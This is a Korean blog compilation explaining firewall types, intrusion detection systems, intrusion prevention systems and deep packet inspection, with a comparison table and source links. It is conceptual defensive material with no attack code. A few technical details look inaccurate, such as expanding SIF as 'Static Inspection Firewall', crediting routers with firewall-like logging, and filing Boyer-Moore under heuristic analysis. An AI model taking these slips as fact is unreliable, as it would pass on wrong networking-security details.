ACL은 사용할 수 있는 서비스를 나열한 단순 리스트로, 이를 통해 외부에서 들어오는 특정 IP 어드레스나 포트 번호를 막을 수 있다. NAT는 하나의 공인 IP 어드레스만으로도 기업이나 조직의 여러 사용자가 인터넷에 접속할 수 있도록 하는 IETF 표준이다. NAT는 개인적인 사설 IP 네트워크를 숨길 수 있기 때문에 내부 사설 IP를 외부로부터 숨김으로써 해커 등이 내부 네트워크 토폴로지를 알지 못하도록 한다.


하지만 기본적으로 라우터는 외부와 내부의 소통을 연결해주는 역할을 하는 장비이기 이를 막는 것이 기본 역할이 아니다. 때문에 라우터의 기본 보안 기능을 사용하는 것은 기본적인 보안 환경을 구현할 수는 있어도 충분한 보안 환경을 구현하기에는 턱없이 부족하다. 라우터는 하드디스크를 이용해 몇 개월치의 사용자 로그를 저장, 불법 접속자에 대한 분석이 가능하고, 단순히 접속을 막고 차단하는 것뿐 아니라 애플리케이션 레벨까지의 강력한 보안을 지원할 수 있다.

·패킷 필터링

패킷 필터링(Packet Filtering) 기능을 가진 파이어월은 OSI 네트워크 계층에서 데이터의 IP 정보를 조사해 접근 제어 규칙에 패킷이 일치하면 통과시키고, 그렇지 않으면 폐기시켜 내부 네트워크로 들어오는 접근을 막는다. 현재는 일반적인 라우터의 기능으로 자리잡았다.


패킷 필터링은 가격이 저렴하고 네트워크 계층 이상의 상위 계층은 인식하지 않으므로 애플리케이션 프록시보다는 처리 속도가 빠르다는 장점이 있는 반면, 다양한 구성이 어렵고 사용자 접속과 외부 침입에 대한 로깅 기능이 없는 것이 단점이다. 따라서 IP 스푸핑 같은 해킹 공격으로 우회해 언제든지 내부 네트워크가 위협받을 수 있다.

·애플리케이션 프록시

애플리케이션 프록시 파이어월은 프록시 기술을 이용해 내부 사용자와 외부 인터넷 사이에 중간자 역할을 수행해 직접적인 연결을 피하고, 각각의 IP와 응용 서비스에 대해 보안적인 조사를 해 접근 제어 규칙을 적용하는 파이어월이다.


프록시 기술은 특정한 애플리케이션에 적용되도록 구성된 일종의 코드다. 따라서 이 방식은 각각의 프로토콜을 프록시로 구현함으로써 패킷 필터링 애플리케이션보다 정교한 접근 제어가 가능하며, 모든 데이터에 대해 상세한 로그가 남는다. 하지만 각 응용 서비스와 프로토콜마다 네트워크의 애플리케이션 계층까지 정보를 갖고 가기 때문에 처리 성능의 저하를 가져올 수 있으며, 프록시의 수가 주요 인터넷 서비스에만 제한돼 새로운 서비스에 즉각 적용하기 어려운 것이 단점이다.

·SIF

SIF(Static Inspection Firewall)는 패킷 필터링 파이어월과 애플리케이션 파이어월 기술을 상호 보완해 탄생시킨 것이다. 이는 전체적인 패킷 필터링을 통해 IP 정보 뿐만 아니라 데이터 정보까지 조사해 애플리케이션 계층까지의 서비스도 규칙에 따라 접근 제어를 할 수 있도록 한다.


이 기술은 네트워크 계층과 데이터 링크 계층 사이의 검사 엔진(Inspection Engine)이 모든 계층의 정보를 바탕으로 접근 제어를 하며, 과거의 교환 정보와 애플리케이션 정보를 갖고 계속적으로 데이터에 대한 승인 여부를 결정하는 것을 말한다.




2.IDS 침입 탐지 시스템의 약어입니다.

사전적의미 : 침입 탐지 시스템 [ 侵入探知-, intrusion detection system ] 

컴퓨터 시스템의 비정상적인 사용, 오용, 남용 등을 실시간으로 탐지하는 시스템. 침입 차단 시스템만으로 내부 사용자의 불법적인 행동(기밀 유출 등)과 외부 해킹에 대처할 수 없으므로 모든 내·외부 정보의 흐름을 실시간으로 차단하기 위해 해커 침입 패턴에 대한 추적과 유해 정보 감시가 필요하다. 
 
즉 유해 패킷패턴을 실시간으로 들여다보는거죠. 엄청 로드 걸리겠죠?

- 침입 패턴 분석으로 정교한 탐지 가능한 IDS

IDS(Intrusion Detection System)는 단순히 외부의 침입을 차단하는데 만족해야 했던 파이어월에서 진일보해 침입의 패턴 데이터베이스와 전문 시스템을 사용해 네트워크나 시스템의 사용을 실시간으로 모니터링하고 침입을 탐지하는 기능을 한다.


파이어월과 IDS를 쉽게 비교한다면, 빌딩을 출입할 때 1층 의자에 앉아있는 경비아저씨를 떠올리면 된다. 경비원들은 출입자의 짐이나 방문 목적을 일일이 확인할 수 없기 때문에 일단은 외모를 보고 판단한다. 파이어월도 마찬가지로, 내부 패킷까지 확인하지 못하고 무조건 TCP/IP 어드레스로 판단하기 때문에 위장을 할 경우 쉽게 침입할 수 있다. 더 큰 문제는 내부인이 건물에서 나가는 경우에는 검문을 하지 않는다는 점이다. 보안 사고의 70% 이상이 내부인에게서 발생한다는 통계를 고려한다면 보안상 허점이 생기는 것이다.


IDS를 설치하면 외부와 내부 출입자의 짐을 검사할 수 있기 때문에 해킹을 2차로 막을 수 있고, 내부 사용자가 승인되지 않는 서버에 접속하는 것도 파악할 수 있다. 파이어월은 네트워크의 출입구에 설치해 정해진 보안 정책에 따라 드나드는 패킷을 검사해서 룰(rule)과 비교해 통과 여부를 결정하는 역할을 한다. IDS도 패킷을 검사한다는 점에서 유사하지만, 네트워크를 출입하는 모든 패킷을 검사한다는 점이 다르다.

- IDS의 해킹 분석 방법론

IDS는 원시 데이터(Raw Data Source), 사건탐지(Event Detection), 분석(Analysis), 대응(Response), 데이터 저장소(Data Storage)의 5가지 요소로 구성된다. 이런 요소들이 순차적으로 조합을 이뤄 침입 탐지 프로세스가 된다.


첫 단계는 정보 수집 단계로, 시스템의 모든 정보를 수집해 다음 단계인 정보 가공, 축약단계로 넘기는 기능을 수행한다(단지 침입 정보만을 수집하는 것이 아니라 모든 정보를 수집한다). 두 번째 단계는 정보 가공과 축약 단계로, 침입 탐지에 필요한 의미있는 정보만을 축약하는 단계다. 세 번째 단계는 침입 여부를 판정하는 분석, 침입 탐지 단계로 침입 탐지 시스템의 핵심 과정이다. 마지막 단계인 보고, 조치단계는 침입으로 판단되면 관리자에게 보고하고 관리자가 조치를 취하는 단계다(히스토리 관리를 위한 로그 기록은 저장한다).


IDS의 분류는 보호하고자 하는 목적 시스템 즉, 침입을 판단하기 위한 데이터를 제공하는 소스에 따른 분류와 침입 모델을 기반으로 하는 분류 방법이 있다. 먼저 데이터 소스를 기반으로 분류하는 방법을 살펴보자.


첫째
, 단일 호스트 기반 IDS는 단일 호스트에서 침입을 탐지하는 것으로 그 호스트의 감사(Audit) 기록이나 들어오는 패킷 등을 검사해 침입을 탐지한다. 예를 들면 호스트의 로그인 프로세스를 감시하고 루트(root) 사용자의 행동을 감시하며, 파일 시스템 감시 등을 통해 침입을 발견하는 것이다.

네트워크 기반의 IDS보다 잘못된 탐지 즉, 침입이 아님에도 불구하고 침입으로 오판하는 경우가 적은 반면, 우선 타깃 호스트에 설치해야 하므로 해당 호스트의 성능이 저하되고, 데이터를 얻기 위한 로그인 등에 대한 설정이 번거로우며 타깃 호스트가 있는 네트워크 내의 다른 호스트들이 공격을 당해도 알 수가 없다는 단점이 있다.


둘째, 다중 호스트 기반 IDS는 여러 호스트들로부터 데이터를 제공받아 침입을 탐지하는 방식이다. 좀 더 정확한 탐지를 위해 타깃 호스트 사이의 통신을 이용하기도 한다.

셋째
, 네트워크 기반 IDS는 패킷 스니퍼(Packet Sniffer)와 패킷 모니터(Packet Monitor) 도구의 발전으로 생겨나게 됐다. 네트워크 상의 모든 트래픽에 대해 패킷을 수집하고 분석해 침입을 발견하는 일은 엄청나게 복잡한 업무다. 이를 자동으로 처리하는 것이 바로 네트워크 기반 IDS이다. 특히 권한없이 접근한다거나 권한을 초과하는 접근에 대한 탐지가 뛰어나다. 또한 네트워크 내의 호스트나 서버의 별도 설정없이 사용할 수 있으며, 파이어월처럼 라우팅 같은 중요한 역할을 담당하지 않기 때문에 오류 발생 시 큰 피해를 주지 않는다.

반면 성능에 대한 요구사항 때문에 서명분석(signature analysis)을 하는 경우가 많은데, 이는 일반적으로 알려진 공격을 탐지하는 데는 뛰어나지만 복잡한 요소를 가진 위험요소를 가진 공격을 탐지하기가 어렵다. 또한 네트워크 패킷 처리능력이 침입 탐지 시스템의 성능을 결정짓게 되므로 적합한 네트워크를 대상으로 적용해야 한다.




3.IPS 침입 방지 시스템의 약어입니다.

 사전적의미 : 침입 방지 시스템 [ 侵入防止-, intrusion prevention system ]

 네트워크에서 공격 서명을 찾아내어 자동으로 모종의 조치를 취함으로써 비정상적인 트래픽을 중단시키는 보안 솔루  션. 수동적인 방어 개념의 침입 차단 시스템이나 침입 탐지 시스템(IDS)과 달리 침입 경고 이전에 공격을 중단시키는 데 초점을 둔, 침입 유도 기능과 자동 대처 기능이 합쳐진 개념의 솔루션이다. 또한 해당 서버의 비정상적인 행동에 따른 정보 유출을 자동으로 탐지하여 차단 조치를 취함으로써 인가자의 비정상 행위를 통제할 수 있다. 
 
보통 침입탐지로 알려진 침입에 대하여 차단하는 솔루션이라 할 수 있죠. 즉 탐지 내용을 방화벽에 전달하여 위험요소 연결을 차단하는 보안제품을 말합니다.

- 선차단 후처리로 즉각 대응 가능한 IPS

파이어월과 IDS의 단점을 보완하는 IPS(Intrusion Prevention System)의 핵심은 ‘능동적 보안’이다. 새로운 애플리케이션과 서비스의 출현 등으로 복잡해진 네트워크 환경의 변화에 따라 공격기법 자체도 급속히 진화하고 있기 때문에 ‘외부로부터 침입과 위협 요소를 사전에 탐지/차단하고 지능화된 각종 공격과 유해 트래픽에 대한 자동화된 보안 대응기술’이 주요 이슈가 되고 있다. 이같은 기술의 가장 대표적인 것이 바로 IPS다.


파이어월의 경우 정해진 규칙에 따라 외부에서의 접근을 차단하는 역할만을 수행하고, IDS는 탐지 중심의 솔루션이라 이상 트래픽을 탐지해도 이에 대한 조처를 취할 수 없다는 단점을 갖고 있다. 설령 내부나 외부로부터의 공격을 탐지했다고 해도, 보안 관리자가 침입을 막기 위한 조치를 취하기 시작하는 시점까지는 어느 정도의 시간이 걸린다. 이 때문에 이미 침입자에 의한 침입이 진행된 상태여서 기업은 오랜 시간과 많은 비용이 소요되는 원상복구와 수리 작업을 수행할 수밖에 없다.


이와 달리 IPS는 공격 시그니처를 찾아내고 네트워크의 트래픽을 관찰해, 수상한 활동을 하는 패킷에 조치를 취할 수 있다. 서버가 비정상적인 행동을 할 경우 자동으로 실행을 중단시킨다. 또한 기존 시스템의 오탐지가 발생하는 것을 피할 수 있도록 정확하게 침입을 구별하고 패킷을 감시하므로 빠른 성능으로 실시간 반응이 가능하도록 개발된 솔루션으로, 최소한의 구성과 커스터마이징으로 관리자의 업무를 줄여줄 수 있다.


특히 고성능 네트워크 프로세서를 장착하고 하드웨어 기반의 어플라이언스 형태로 설계돼 높은 성능을 제공하고, VIPS(Virtual IPS) 기능을 이용해 설치와 운영에서의 유연성 보장도 가능하다는 것이 장점이다.  기존 보안 솔루션의 장점을 흡수하면 발전된 IPS는 기반으로 하는 보안 기술이나 아키텍처가 업체마다 달라 초기에는 사용자를 혼란스럽게 하기도 했다. 하지만 시장에 적용되는 과정을 거치면서 기능이나 성능 등에서 일정한 범위를 갖게 됐다.


현재 IPS의 핵심기술로 가장 중요시되는 것은 급속한 증가가 예상되는 제로데이 공격(Zero-day Attack)의 위협에 대한 능동적 대응 기법과 알려지지 않은 공격(Unknown Attack)이나 이상 트래픽(Anomaly Traffic)을 효율적으로 탐지하고 방어할 수 있는 정확한 분석 기능이다.


이를 위해 IPS는 시그니처 패턴 매칭 기법과 트래픽 유형 분석, 그리고 프로토콜 분석 기능을 병행해 동작하는데, 내/외부로부터 악의적인 공격과 유해 트래픽의 실시간 탐지/차단을 위해 모든 네트워크 트래픽과 프로토콜에 대한 완벽하고 철저한 분석기능을 제공해야 한다.


특히, IDS의 단점인 오탐율 최소화와 알려지지 않은 신종 변종 공격에 효율적인 대처를 위해 패킷 기반 뿐 아니라 세션 기반 탐지 기법까지 제공해야 하며, 다양한 이상 징후 탐지(Anomaly Detection) 기법과 분석 기능 제공이 필수적이다.

- IPS의 주요 기능과 구성

IPS도 크게 호스트 기반 IPS와 네트워크 IPS로 나눌 수 있다.

호스트 IPS는

▲커널과 함께 동작해 커널 이벤트를 가로채 처리하는 방식과

▲커널과 독립적으로 작동하는 방식으로 구분된다. 커널의 이벤트를 가로채는 방식은 대부분 액세스 컨트롤의 기능을 가지고 트러스트 운영체제 제품군이고, 커널과 독립적으로 작동하는 방식은 차폐(Shielding) 기술 또는 시그니처와 행동 기반 분석 알고리즘을 탑재해, 이벤트를 관찰해 특정 규칙에 위배하는 이벤트를 필터링하는 제품으로 선보였다.

이같은 기술이 일반적인 IDS나 바이러스 백신 제품과 차이점은 규칙이나 시그니처 기반의 방어뿐만 아니라, 패킷의 행동에 의해 자동적으로 반응을 한다는 것이다. 자동적인 반응의 형태는 각 이벤트의 위험 수위에 따라 달라지며, 결정된 반응의 형태는 관리자가 조절할 수 있다. 이런 선조치 후처리 방식은 악의적인 이벤트로 인한 시스템의 피해를 최소화할 수 있다. 또한 기존의 방식인 선탐지 후조치의 관리 방식을 개선해 보안 관리자의 업무를 줄여줄 수 있다.


네트워크 기반 IPS의 핵심은 실시간 패킷 처리 속도, 오탐지를 최소화하는 기술, 변형 공격과 오용공격의 탐지 기술, 그리고 각 상황에 맞는 실시간 반응 기술이 주요하다.


- IPS를 구성하는 주요 기술은 다음과 같다.

·오탐지 또는 미탐지를 최소화하며 자동적으로 한계영역을 조절하는 실시간 적응형 알고리즘

·모든 네트워크의 활동과 애플리케이션 취약점에 대한 침입을 탐색해, 침입여부를 판단하는 결정(Deterministic)과 퍼지(FUZZY) 등의 확률 또는 인공지능 알고리즘


·DDoS 공격에 대한 방어와 감내 알고리즘


·성능이 향상된 행동 분석 알고리즘


·변형 침입 탐지와 오용 탐지의 고유 알고리즘


·다양한 종류의 방지 방법과 방식


·방지하는 방법이 정확함을 입증할 수 있는 자동화된 피드백 메커니즘


·방지 능력과 빠른 반응 속도를 위한 네트워크상의 위치 제품


·탐지와 방지 로그의 최소화 혹은 빠른 분석 속도를 위한 분류된 로그의 사용으로 향상된 로그 관리


·내부에서 외부 혹은 내부에서 내부의 침입을 막기위한 접근 권한 알고리즘


·패킷 캡처와 분석 시간, 반응 시간의 실시간 처리를 위한 성능


·하드웨어 일체형, ASIC 기반 등

IPS의 설치 위치는 보호하고자 하는 네트워크의 전단에 배치하는 것이 일반적이다. DMZ나 내부 서버팜, 그리고 내부 네트워크 적용하는 것이다. 그러나 네트워크 관리자나 보안 관리자에 의해 특정 세그먼트에 적용할 수도 있다.

IPS가 DMZ 내에 위치하게 되면 웹서버나 메일 서버를 외부 악성 공격을 방어할 수 있으며, 파이어월 앞단에 위치하면 악성공격을 실시간으로 차단함으로서 파이어월의 부하를 줄여준다. 또한 서버 팜과 연결해 외부의 공격으로부터 중요 서버들을 보호하며, 내부 네트워크에서는 내부 공격에 대응해 해킹사고를 미연에 방지할 수 있다.


구분

IDS

IPS

성격

 - Positive & Reactive 탐지와 패턴 등록후  반응

 - Active & Pro-Active 공격전 사전 차단

목적

 - 침입 여부 탐지

 - 침입 방지 목적, 침입 탐지후 적극적 대응

분석
방법

 - 시그너처 DB기반 패턴 매칭 방법
 - 알려진 공격 패턴 탐지

 -시스템 Call에 대해 정책, Rule DB기반
   비정상 행위 방지

대응
방법

 - 관리자에게 경고
 - ESM 통해 Firewall Rule Set 변경

 - 알려지지 않은 공격탐지
 - 자원 접근 차단 

 


 

 

 

 

 

 

 

 

출처 : http://blog.naver.com/pysdiamo/120042109989

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

신고

Comment +0

1. QoS 확보를 위한 패킷 내용의 감시, DPI

      - 기존의 라우터나 스위치가 헤더 부분만을 파악했던 것과는 다르게 패킷의 Signature 전부를 
        분석하여 해당 트래픽의 의도를 파악, 해킹의 탐지 및 악성코드 필터링 위한 기술

      

 

2. DPI의 주요 기능 및 Signature 분석 방법

 

   가. DPI의 주요 기능

      1) 병목구간의 탐지 (서비스/트래픽/디바이스의 병목의 근원 검색/관리)

      2) 트래픽 제어 (P2P, VoIP에 따른 과부하의 조정, QoS의 보장)

      3) 공격 패킷 차단 (악성코드, 스팸 등의 대규모 공격을 사전 차단)

      4) SLA 측정 지원 (QoE, ARPU, Billing의 효과성 측정)

 

   나. DPI의 Signature 분석 방법

      
1) 접속 포트 분석 : 필터링

      2) 문자열 비교 분석 : 카프-라빈, KMP 검색 알고리즘

      3) 숫자 속성 분석 : 오토마타(DFA, NFA)
 
      4) 
행동 및 휴리스틱 분석 : 보이어-무어 검색 알고리즘

 

 

 

 

참고 : http://blog.naver.com/winipe?Redirect=Log&logNo=150160180306

 

 

 

 

신고

Comment +0